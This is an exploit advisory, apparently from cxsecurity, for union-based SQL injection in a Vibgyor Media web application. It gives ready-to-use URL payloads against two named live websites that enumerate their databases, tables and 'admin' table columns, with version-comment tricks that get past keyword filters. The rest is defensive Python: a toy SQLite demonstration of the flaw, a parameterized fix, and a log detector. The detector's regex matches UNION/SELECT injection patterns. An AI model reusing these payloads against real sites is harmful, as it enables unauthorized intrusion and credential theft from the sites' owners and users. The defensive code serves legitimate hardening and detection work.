WebKraze,Vibgyor Media Web Application Union-based Sql Injection
2025-1-9 22:23:7 Author: cxsecurity.com (view original)


# Exploit Title: WebKraze,Vibgyor Media Web Application Union-based Sql Injection
# Date: 2024-12-25
# Exploit Author: Parastou Razi
# Contact: [email protected]
# Category: webapps
# Tested On: Windows, Firefox

Proof of Concept:

1. Description:

When an application is vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database. This is commonly known as a SQL injection UNION attack. In union-based SQLi the attacker uses the UNION operator to combine a benign SQL statement with a malicious one; the malicious statement must return the same number of columns, with compatible data types, as the original statement. A vulnerable database processes the combined statement and executes the injected query.

[+] For UNION-based SQL injection, first append "'" to the end of the link; the page content will change, which shows that the parameter reaches the query unescaped:

https://www.alikhalafforklifts.com/products.php?id=22
https://www.alikhalafforklifts.com/products.php?id=22'
https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=1093
https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=1093'

2. Proof

#Demo 1:

https://www.alikhalafforklifts.com/products.php?id=-22%27%20/*!12345union*/%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*!froM*/information_schema.schemata%23--+
http://www.alikhalafforklifts.com/products.php?id=-22%27%20/*!12345union*/%20select%201,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*!FROM*/information_schema./*!tables*/%20WHERE%20table_schema=%22vibgyorm_alikhalif%22%23--+

#Demo 2:

https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27%20/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,database(),17,18,19,20,21,22,23,24,25,26,27/*!FROM*/%20information_schema.schemata--+
https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22,23,24,25,26,27/*!FROM*/information_schema./*!tables*/%20WHERE%20table_schema=%22wwwwegoc_atforsure%22--+
https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,column_name,17,18,19,20,21,22,23,24,25,26,27/*!FROM*/%20information_schema.columns%20WHERE%20table_name=%22admin%22%23
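To make the description concrete from the defender's side, the following Python is an added example, not code from the advisory and not the affected applications' own code. It builds a constructed in-memory SQLite database, shows the concatenation defect behind a products.php?id= style lookup beside its parameterized and validated fix, and adds a small log-side check for the UNION ... SELECT shape, including the /*!12345union*/ version-comment form the demo URLs use to get past naive keyword filters. Table names, column names, sample rows and payload strings are all assumptions constructed for the example (SQLite syntax is used, so the comment marker is -- rather than the MySQL # seen in the demo URLs).

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed inputs in the shape of the advisory's probes (SQLite syntax).
QUOTE_PROBE = "22'"
UNION_TABLES = "-22' UNION SELECT 1, name, 3 FROM sqlite_master WHERE type='table'-- "
UNION_BAD_COUNT = "-22' UNION SELECT 1, name FROM sqlite_master-- "


def build_db() -> sqlite3.Connection:
    """Constructed toy database: the products table the page queries plus a
    second table holding data the query was never meant to expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (22, 'Forklift model A', 15000.0);
        CREATE TABLE admin (username TEXT, password_hash TEXT);
        INSERT INTO admin VALUES ('admin', 'PLACEHOLDER-HASH');
        """
    )
    return conn


def lookup_product_vulnerable(conn, product_id: str):
    """The defect: the request parameter is spliced inside single quotes, so a
    quote in the input changes the query's structure. This is the pattern
    behind a lookup written as "... WHERE id = '$id'" in a PHP page."""
    sql = f"SELECT id, name, price FROM products WHERE id = '{product_id}'"
    return conn.execute(sql).fetchall()


def run_vulnerable(conn, product_id: str):
    """Return ('rows', [...]) or ('error', message). A lone quote breaks the
    query (the 'page information will change' signal), a UNION with the wrong
    column count errors, and one with the right count returns foreign rows."""
    try:
        return ("rows", lookup_product_vulnerable(conn, product_id))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def lookup_product_safe(conn, product_id: str):
    """Hardened form: reject anything that is not a decimal integer, then bind
    the value as a parameter. Binding alone already neutralises the payload
    (it is compared as a literal and matches no row); the validation turns
    the attempt into a clean rejection that can be logged."""
    if not re.fullmatch(r"[0-9]{1,10}", product_id):
        raise ValueError("id must be a decimal integer")
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return conn.execute(sql, (int(product_id),)).fetchall()


def run_safe(conn, product_id: str):
    """Same shape as run_vulnerable for side-by-side comparison."""
    try:
        return ("rows", lookup_product_safe(conn, product_id))
    except ValueError as exc:
        return ("rejected", str(exc))


# Detection side: UNION ... SELECT, also when wrapped in MySQL version
# comments (/*!12345union*/ ... /*!FROM*/) as in the advisory's demo URLs.
UNION_SELECT_RE = re.compile(
    r"(?:/\*!\d*\s*)?union\s*(?:\*/)?\s*(?:/\*!\d*\s*)?select", re.IGNORECASE
)


def flag_query_param(raw_value: str):
    """Classify one raw (still URL-encoded) query parameter value taken from
    an access log. Returns a reason string for review, or None."""
    value = unquote_plus(raw_value)
    if UNION_SELECT_RE.search(value):
        return "union-select"
    if "'" in value and re.search(r"--|#|/\*", value):
        return "quote-and-comment"
    return None


if __name__ == "__main__":
    db = build_db()
    for value in ("22", QUOTE_PROBE, UNION_BAD_COUNT, UNION_TABLES):
        print(repr(value), "->", run_vulnerable(db, value), "| safe:", run_safe(db, value))
    for raw in ("22", "22%27", "-22%27%20/*!12345union*/%20select%201,database(),3"):
        print(raw, "->", flag_query_param(raw))
```

Running the script shows the three behaviours the advisory relies on in one place: the vulnerable lookup errors on a bare quote, errors on a UNION whose column count does not match, and returns the names of both tables from sqlite_master when the count matches, while the parameterized lookup returns the product for "22" and rejects every payload before it reaches the database. The detector is deliberately narrow; a lone quote probe is better caught by logging the application's own query errors than by pattern matching.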



Article source: https://cxsecurity.com/issue/WLB-2025010012